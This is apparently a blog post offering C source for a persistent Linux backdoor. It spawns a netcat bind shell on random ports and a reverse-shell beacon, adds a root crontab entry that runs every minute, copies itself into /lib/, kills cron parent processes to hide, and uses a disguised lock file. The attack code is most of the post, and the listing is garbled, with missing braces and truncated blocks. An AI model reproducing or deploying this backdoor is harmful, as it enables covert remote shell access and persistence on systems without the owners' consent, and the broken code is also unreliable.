Here’s a fun program that persistently backdoors a system.
Must run as root if you want the listener to be persistent. Of course it can be modified to use a normal user.

Utilizes a file lock to ensure only one instance of the program is running.
Forks itself, the child is a listener, and the parent is a beacon (double the backdoor fun!)

Kills the cron process (not the daemon) so there’s no hanging cron shell and disassociates itself from cron.
Copies its executable into a “normal” looking name and place.
Persists using cron-job that runs every minute.
Port hops after its connected to (not a keep-alive netcat listener, but it constantly restarts netcat)


#define PLEN 8

void main_process(char *named_pipe,pid_t parent_pid);
void beacon(char *named_pipe, int interval_in_seconds);
int check_file_lock(void);
int random_port_range(int min,int max);
void generate_alphanumeric(char *s, int length);
void make_persistent(char** argv);
void hide_while_running(int ppid);

int main(int argc, char** argv) {
    pid_t forked_pid;
    pid_t parent_pid = getppid();
    char named_pipe_dir[] = "/tmp/";
    int np_buf = strlen(named_pipe_dir)+PLEN+1;
    char listen_pipe[np_buf];
    char beacon_pipe[np_buf];
    generate_alphanumeric(listen_pipe, PLEN);
    generate_alphanumeric(beacon_pipe, PLEN);
    mkfifo(listen_pipe, 0666);
    mkfifo(beacon_pipe, 0666);
    forked_pid = fork();
    if (forked_pid == 0) {
    else { //Socket data is coded into beacon function
        int interval_in_seconds = 30;
    return 0;

void main_process(char *named_pipe,pid_t parent_pid) {
    //Sets up a listener on a random port (defined in the while loop). Shovels out a shell.
    //Of note, does not use -k so the port will change after each connection.
    int listen_port;
    char listener_command[60+strlen(named_pipe)*2]; //Magic number 60 refers to the rest of the command run by system() below.


    /*while(1) {
        listen_port = random_port_range(4000,4500);
        snprintf(listener_command,sizeof(listener_command), "/bin/bash 0<%s | nc -l -p %d 1>%s", named_pipe, listen_port, named_pipe);

void beacon(char *named_pipe, int interval_in_seconds) {
    //Parent process. Beacons out using nc every <interval_in_seconds>.
    int beacon_port = 54311;
    char beacon_dst[] = "";
    char beacon_command[60+strlen(named_pipe)*2];
    snprintf(beacon_command,sizeof(beacon_command), "/bin/bash 0<%s | nc %s %d 1>%s", named_pipe, beacon_dst, beacon_port, named_pipe);
    printf("Beacon started\n");
    while(1) {
    printf("Beacon ended\n");

int random_port_range(int min,int max) {
    //Just picks a random number between min and max and returns it
    int range = max - min + 1;
    int result = (rand()%range)+min;
    return result;

void generate_alphanumeric(char *s, int length) {
    //Appends <length> random characters to the end of string "s" followed by a \0. Make sure you have enough space in your character array.....
    static const char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    int start = strlen(s);
    //i is started here because this is the length of directory name (ie. /tmp/ = 5)
    //starting on 5 (position 6 in the array), wipes out the \0 and continues our string
    int i;
    for (i = start; i < length + start; ++i) {
        s[i] = alphanum[rand() % (sizeof(alphanum)-1)];
    s[length + start] = '\0';

void make_persistent(char** argv) {
    //This function makes persistent by copying the executable (argv[0]) into a known location and adding it as a cron job
    char new_path[] = "/lib/";
    if (access(new_path, F_OK ) == -1) {
        char cp_command[strlen(argv[0])+strlen(new_path)+5];
        //vulnerability here (relative path)
        snprintf(cp_command,sizeof(cp_command),"cp %s %s",argv[0],new_path);

    int check_cron = system("grep /lib/ /var/spool/cron/crontabs/root 1>/dev/null 2>&1");
    if (check_cron > 0) {
        FILE *cron_file = fopen("/var/spool/cron/crontabs/root","a");
        fprintf(cron_file,"\n* * * * * /lib/\n");
    system("service cron start");
    system("service cron reload");

void hide_while_running(pid_t ppid) {
    //This function kills the parents ppid and ppid of the original program run. If started by cron, this will be a cron process.
    //If you run this program, it will kill your shell.
    char grep_command[50];
    snprintf(grep_command,sizeof(grep_command),"grep PPid /proc/%d/status | cut -d: -f 2",ppid);
    //Running a grep command to find this processes ppid. This will be a cron process (not the daemon) if started by cron
    FILE *fp = popen(grep_command,"r");
    char *response = NULL;
    size_t len = 0;
    //getline gets the response from the grep command, and puts the data into response
    getline(&response, &len, fp);
    //turn the response into an int so we can send a kill signal
    int pid_to_kill = atoi(response);
    printf("PPID to kill: %s\n",response);
    kill(pid_to_kill, SIGTERM);
    kill(ppid, SIGTERM);

    if (access("/bin/ps2", F_OK ) == -1) {
        //system("cp /bin/ps /bin/ps2");

int check_file_lock(void) {
    //Trys to lock a file. If its already locked, program exits. This is so it only runs once.
    int lockfile = open("/tmp/apparmor.lck",O_CREAT | O_RDWR, 0666);
    int lock_status = flock(lockfile, LOCK_EX | LOCK_NB);
    printf("LOCK STATUS: %d\n",lock_status);
    if (lock_status < 0) {
    return 0;
C Programming – Persistent Backdoor

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